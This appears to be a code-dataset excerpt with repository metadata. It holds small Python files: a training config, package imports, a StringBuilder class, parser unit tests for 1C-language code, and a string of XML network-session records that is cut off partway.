2022-02-06T17:25:33.000Z
|
training_dir = "/content/drive/My Drive/data/sign_data/train"
training_csv = "/content/drive/My Drive/data/sign_data/train_data.csv"
testing_csv = "/content/drive/My Drive/data/sign_data/test_data.csv"
testing_dir = "/content/drive/My Drive/data/sign_data/test"
batch_size = 32
epochs = 20
| 41.428571
| 70
| 0.786207
| 49
| 290
| 4.428571
| 0.326531
| 0.221198
| 0.258065
| 0.35023
| 0.709677
| 0.709677
| 0.709677
| 0.709677
| 0
| 0
| 0
| 0.014925
| 0.075862
| 290
| 6
| 71
| 48.333333
| 0.794776
| 0
| 0
| 0
| 0
| 0
| 0.662069
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a13655df17b7fcd607fc65bf6c003511463dea2e
| 247
|
py
|
Python
|
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
from cqi_cpp.src.wrapper.qtree_wrapper import PyQTree
from cqi_cpp.src.wrapper.qtree_wrapper import PyBox as Box
from cqi_cpp.src.wrapper.qtree_wrapper import PyDiscrete as Discrete
from cqi_cpp.src.wrapper.qtree_wrapper import PyVector as Vector
| 49.4
| 68
| 0.862348
| 42
| 247
| 4.880952
| 0.357143
| 0.136585
| 0.195122
| 0.253659
| 0.741463
| 0.741463
| 0.741463
| 0.741463
| 0
| 0
| 0
| 0
| 0.089069
| 247
| 4
| 69
| 61.75
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
a13c8c507331e73e19ff5cc6adf8284db751763c
| 198
|
py
|
Python
|
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
class StringBuilder(object):
def __init__(self, s=""):
self.s = s
def append(self, s):
self.s = self.s + s
return self
def __str__(self):
return self.s
| 18
| 29
| 0.535354
| 27
| 198
| 3.62963
| 0.37037
| 0.306122
| 0.27551
| 0.306122
| 0.22449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.343434
| 198
| 10
| 30
| 19.8
| 0.753846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0
| 0.125
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a1a90367560c293edac4dd02517185f9a3126fbd
| 3,074
|
py
|
Python
|
tests/test_parser/test_module.py
|
vbondarevsky/ones_analyzer
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 12
|
2017-11-23T07:04:13.000Z
|
2022-03-01T21:06:56.000Z
|
tests/test_parser/test_module.py
|
vbondarevsky/analyzer_test
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 2
|
2017-06-25T21:32:32.000Z
|
2017-11-19T19:05:40.000Z
|
tests/test_parser/test_module.py
|
vbondarevsky/analyzer_test
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 5
|
2017-11-21T08:24:56.000Z
|
2021-08-17T23:21:18.000Z
|
from analyzer.syntax_kind import SyntaxKind
from tests.utils import TestCaseParser
class TestParserModule(TestCaseParser):
def test_empty(self):
self.parse_source("")
self.assertNode(self.syntax_tree.declarations, [])
self.assertNode(self.syntax_tree.methods, [])
self.assertNode(self.syntax_tree.statements, [])
def test_declarations(self):
self.parse_source("Перем А")
self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
self.assertNode(self.syntax_tree.methods, [])
self.assertNode(self.syntax_tree.statements, [])
def test_methods(self):
code = \
"""Процедура МояПроцедура()
КонецПроцедуры
Функция МояФункция()
КонецФункции"""
self.parse_source(code)
self.assertNode(self.syntax_tree.declarations, [])
self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock, SyntaxKind.FunctionBlock])
self.assertNode(self.syntax_tree.statements, [])
def test_statements(self):
self.parse_source("А=8+2;")
self.assertNode(self.syntax_tree.declarations, [])
self.assertNode(self.syntax_tree.methods, [])
self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
self.assertNode(self.syntax_tree.statements[0].semicolon_token, SyntaxKind.SemicolonToken)
def test_declarations_and_methods(self):
code = \
"""Перем А;
Процедура МояПроцедура()
КонецПроцедуры"""
self.parse_source(code)
self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
self.assertNode(self.syntax_tree.statements, [])
def test_declarations_and_statements(self):
code = \
"""Перем А;
А=8"""
self.parse_source(code)
self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
self.assertNode(self.syntax_tree.methods, [])
self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
def test_methods_and_statements(self):
code = \
"""Процедура МояПроцедура()
КонецПроцедуры
А=8"""
self.parse_source(code)
self.assertNode(self.syntax_tree.declarations, [])
self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
def test_declarations_and_methods_and_statements(self):
code = \
"""Перем А;
Процедура МояПроцедура()
КонецПроцедуры
А=8"""
self.parse_source(code)
self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
| 40.986667
| 104
| 0.675992
| 303
| 3,074
| 6.683168
| 0.138614
| 0.17284
| 0.222222
| 0.296296
| 0.855309
| 0.795062
| 0.756543
| 0.725432
| 0.70321
| 0.687901
| 0
| 0.002488
| 0.215355
| 3,074
| 74
| 105
| 41.540541
| 0.837065
| 0
| 0
| 0.673469
| 0
| 0
| 0.004844
| 0
| 0
| 0
| 0
| 0
| 0.510204
| 1
| 0.163265
| false
| 0
| 0.040816
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a1ff629a976514830820808e4c2bf18ea78653d8
| 175
|
py
|
Python
|
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
from .MyMplCanvas import *
from .MyMplCanvas import MyMplCanvas
from .DataCanvas import *
from .FitCanvas import *
from .KineticsCanvas import *
from .SpectrumCanvas import *
| 25
| 36
| 0.8
| 19
| 175
| 7.368421
| 0.368421
| 0.285714
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137143
| 175
| 6
| 37
| 29.166667
| 0.927152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
62a8ed0ff1849e2b2cd20eddae9aef290321d76a
| 71,710
|
py
|
Python
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 3
|
2018-08-21T21:45:22.000Z
|
2021-01-07T03:16:54.000Z
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 1
|
2021-12-13T19:46:27.000Z
|
2021-12-13T19:46:27.000Z
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 1
|
2018-09-12T16:10:14.000Z
|
2018-09-12T16:10:14.000Z
|
xmlstr = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?><activeList noOfActiveSession="245"><activeSession><user_name>00:11:BB:E2:C4:E4</user_name><calling_station_id>00:11:BB:E2:C4:E4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000A0</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:AD:71:48</user_name><calling_station_id>00:00:AA:AD:71:48</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:9B:E2:C1</user_name><calling_station_id>D8:EB:97:9B:E2:C1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9D:78:22</user_name><calling_station_id>00:11:BB:9D:78:22</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:1A:66:00:00:00</user_name><calling_station_id>00:1A:66:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D1:82:15</user_name><calling_station_id>00:11:BB:D1:82:15</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:65:90:5F</user_name><calling_station_id>D8:EB:97:65:90:5F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002E</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:5B:F0:AD</user_name><calling_station_id>00:11:BB:5B:F0:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8A:78:50</user_name><calling_station_id>00:11:BB:8A:78:50</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:49:24:B1</user_name><calling_station_id>00:11:BB:49:24:B1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:21:2D:00:00:00</user_name><calling_station_id>00:21:2D:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.32</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:B7:6F:D5</user_name><calling_station_id>D8:EB:97:B7:6F:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.38</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:02:DD:25</user_name><calling_station_id>00:00:AA:02:DD:25</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:23:E4:49</user_name><calling_station_id>00:11:BB:23:E4:49</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:D9:25:CE</user_name><calling_station_id>D8:EB:97:D9:25:CE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000069</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CB:E3:01</user_name><calling_station_id>00:11:BB:CB:E3:01</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>5C:38:E0:00:00:00</user_name><calling_station_id>5C:38:E0:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.59</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B0:56:02</user_name><calling_station_id>00:11:BB:B0:56:02</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:34:D1:13</user_name><calling_station_id>00:11:BB:34:D1:13</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.54</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:73:A6:42</user_name><calling_station_id>00:00:AA:73:A6:42</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.56</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:09:C7:55</user_name><calling_station_id>00:11:BB:09:C7:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9A:BD:D8</user_name><calling_station_id>00:11:BB:9A:BD:D8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.44</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:AA:62:C1</user_name><calling_station_id>D8:EB:97:AA:62:C1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E8:06:7E</user_name><calling_station_id>00:11:BB:E8:06:7E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:05:7C:F4</user_name><calling_station_id>00:00:AA:05:7C:F4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:47:34:D3</user_name><calling_station_id>D8:EB:97:47:34:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:08:34:E9</user_name><calling_station_id>00:11:BB:08:34:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>18:26:66:00:00:00</user_name><calling_station_id>18:26:66:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F8:AC:8A</user_name><calling_station_id>00:11:BB:F8:AC:8A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E5:D8:BE</user_name><calling_station_id>D8:EB:97:E5:D8:BE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:4A:90:F5</user_name><calling_station_id>00:11:BB:4A:90:F5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CA:2D:6F</user_name><calling_station_id>00:11:BB:CA:2D:6F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:19:F5:00:00:00</user_name><calling_station_id>00:19:F5:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:96:4B:C8</user_name><calling_station_id>00:00:AA:96:4B:C8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:00:DD:B7</user_name><calling_station_id>D8:EB:97:00:DD:B7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.158</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6E:D6:A2</user_name><calling_station_id>00:11:BB:6E:D6:A2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.160</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:B0:14</user_name><calling_station_id>00:11:BB:96:B0:14</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000B4</acct_session_id><server>web</server><framed_ip_address>10.0.1.149</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:88:28:D5</user_name><calling_station_id>D8:EB:97:88:28:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.140</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CB:70:82</user_name><calling_station_id>00:11:BB:CB:70:82</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.139</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:D0:5B:00:00:00</user_name><calling_station_id>00:D0:5B:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AE:5B:66</user_name><calling_station_id>00:11:BB:AE:5B:66</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.129</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:64:22:DD</user_name><calling_station_id>D8:EB:97:64:22:DD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.123</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DA:28:63</user_name><calling_station_id>00:11:BB:DA:28:63</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.123</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:D1:65:F7</user_name><calling_station_id>00:00:AA:D1:65:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.122</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:75:65:C7</user_name><calling_station_id>D8:EB:97:75:65:C7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.113</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:19:E3:00:00:00</user_name><calling_station_id>00:19:E3:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.111</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8B:05:B2</user_name><calling_station_id>00:11:BB:8B:05:B2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.112</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:87:7E:F6</user_name><calling_station_id>00:11:BB:87:7E:F6</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.105</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:40:2D:7B</user_name><calling_station_id>00:00:AA:40:2D:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000024</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B4:B0:17:00:00:00</user_name><calling_station_id>B4:B0:17:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.87</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8F:A3:FA</user_name><calling_station_id>00:11:BB:8F:A3:FA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.85</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:63:C9:36</user_name><calling_station_id>00:11:BB:63:C9:36</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.74</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E1:EA:BF</user_name><calling_station_id>D8:EB:97:E1:EA:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.75</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:06:45:00:00:00</user_name><calling_station_id>00:06:45:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.60</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:7D:E8:42</user_name><calling_station_id>00:00:AA:7D:E8:42</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:BD:0D:1C</user_name><calling_station_id>00:11:BB:BD:0D:1C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.56</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:06:8C:83</user_name><calling_station_id>D8:EB:97:06:8C:83</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.58</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:61:69:94</user_name><calling_station_id>00:11:BB:61:69:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.37</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:49:C7:90</user_name><calling_station_id>D8:EB:97:49:C7:90</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.35</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:4E:FB:7B</user_name><calling_station_id>00:11:BB:4E:FB:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000F9</acct_session_id><server>web</server><framed_ip_address>10.0.1.25</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>AC:34:CB:00:00:00</user_name><calling_station_id>AC:34:CB:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C7:06:B5</user_name><calling_station_id>00:11:BB:C7:06:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>1C:3A:4F:00:00:00</user_name><calling_station_id>1C:3A:4F:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:91:CD:05</user_name><calling_station_id>00:11:BB:91:CD:05</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C0:77:D5</user_name><calling_station_id>00:11:BB:C0:77:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000044</acct_session_id><server>web</server><framed_ip_address>10.0.1.76</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E3:9E:72</user_name><calling_station_id>00:00:AA:E3:9E:72</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.67</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:82:C5:65</user_name><calling_station_id>D8:EB:97:82:C5:65</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.66</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>88:1D:FC:00:00:00</user_name><calling_station_id>88:1D:FC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.55</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F6:4F:45</user_name><calling_station_id>00:11:BB:F6:4F:45</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B8:8F:14:00:00:00</user_name><calling_station_id>B8:8F:14:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.32</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:43:07:55</user_name><calling_station_id>00:11:BB:43:07:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:31:BD:F7</user_name><calling_station_id>00:00:AA:31:BD:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:3C:31</user_name><calling_station_id>00:11:BB:E1:3C:31</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:7F:3B:11</user_name><calling_station_id>D8:EB:97:7F:3B:11</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.18</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B8:38:CA:00:00:00</user_name><calling_station_id>B8:38:CA:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:AB:DB:07</user_name><calling_station_id>00:00:AA:AB:DB:07</calling_station_id><nas_ip_address>198.1